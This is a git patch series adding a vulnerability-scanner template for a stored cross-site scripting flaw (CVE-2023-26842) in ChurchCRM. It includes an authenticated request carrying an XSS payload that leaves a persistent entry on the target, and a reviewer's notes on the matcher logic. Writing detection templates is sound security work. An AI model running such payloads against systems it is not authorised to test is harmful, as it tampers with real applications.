From dad8a4d86ce9cf88a655cc05f05d2f7a7c0c294c Mon Sep 17 00:00:00 2001
From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com>
Date: Sun, 25 Jun 2023 01:32:26 +0530
Subject: [PATCH 1/3] Create CVE-2023-26842.yaml
---
 http/cves/2023/CVE-2023-26842.yaml | 52 ++++++++++++++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-26842.yaml
diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml
new file mode 100644
index 0000000000..de53597b39
--- /dev/null
+++ b/http/cves/2023/CVE-2023-26842.yaml
@@ -0,0 +1,52 @@
+id: CVE-2023-26842
+
+info:
+ name: ChurchCRM - Stored Cross Site Scripting
+ author: Harsh
+ severity: medium
+ description: |
+ A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.
+ reference:
+ - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26842
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-26842
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2023-26842
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: cve,cve2023,churchCRM,stored,xss,authenticated
+http:
+ - raw:
+ - |
+ POST /churchcrm/session/begin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ User={{username}}&Password={{password}}
+
+ - |
+ POST /churchcrm//OptionManager.php?mode=classes&ListID=1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ 1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=" onfocus=alert(document.domain) autofocus="&AddField=Add+New+Person+Classification
+
+ cookie-reuse: true
+ redirects: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "onfocus=alert(document.domain) autofocus=")'
+ - 'contains(body_2, "ChurchCRM")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: nonce
+ group: 1
+ regex:
+ - 'id="form_session_token" value="(.*)" type="hidden"'
+ internal: true
From 5ffcba81f7acf94edcfb05b2ba16a8dafd9aa567 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 26 Jun 2023 11:02:18 +0530
Subject: [PATCH 2/3] updated path,info
---
 http/cves/2023/CVE-2023-26842.yaml | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)
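Review bot: The second DSL matcher can fire against a target that correctly HTML-encodes the submitted name, because the substring it checks, `onfocus=alert(document.domain) autofocus=`, leaves out the `"` characters that actually break out of the attribute; a patched instance echoing `&quot; onfocus=alert(document.domain) autofocus=&quot;` still satisfies it. Match on the raw quote too, e.g. `- 'contains(body_2, "\" onfocus=alert(document.domain) autofocus=\"")'` (assuming the DSL honors the backslash escape as in other templates), or add `- '!contains(body_2, "&quot; onfocus=alert(document.domain)")'` to the `and` set. The `nonce` extractor for `form_session_token` is declared `internal` but `{{nonce}}` is never referenced in the second request, so it is dead weight; either drop it or carry it in the POST body if ChurchCRM validates that token on this form. Since each run persistently creates a person-classification row containing the payload, the template should also carry the `intrusive` tag and its description should note that the entry is left behind for manual cleanup.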
diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index de53597b39..03b4629b29 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -1,7 +1,7 @@ id: CVE-2023-26842 info: - name: ChurchCRM - Stored Cross Site Scripting + name: ChurchCRM 4.5.3 - Cross-Site Scripting author: Harsh severity: medium description: | @@ -16,18 +16,19 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2023,churchCRM,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored,xss,authenticated + http: - raw: - | - POST /churchcrm/session/begin HTTP/1.1 + POST /session/begin HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded User={{username}}&Password={{password}} - | - POST /churchcrm//OptionManager.php?mode=classes&ListID=1 HTTP/1.1 + POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -39,6 +40,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=alert(document.domain) autofocus=")' - 'contains(body_2, "ChurchCRM")' condition: and From c8a71e932fb87d19bf3201301c41a37a42094641 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 26 Jun 2023 11:07:41 +0530 Subject: [PATCH 3/3] lint fix --- http/cves/2023/CVE-2023-26842.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 03b4629b29..635658fdd3 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -1,7 +1,7 @@ id: CVE-2023-26842 info: - name: ChurchCRM 4.5.3 - Cross-Site Scripting + name: ChurchCRM 4.5.3 - Cross-Site Scripting author: Harsh severity: medium description: |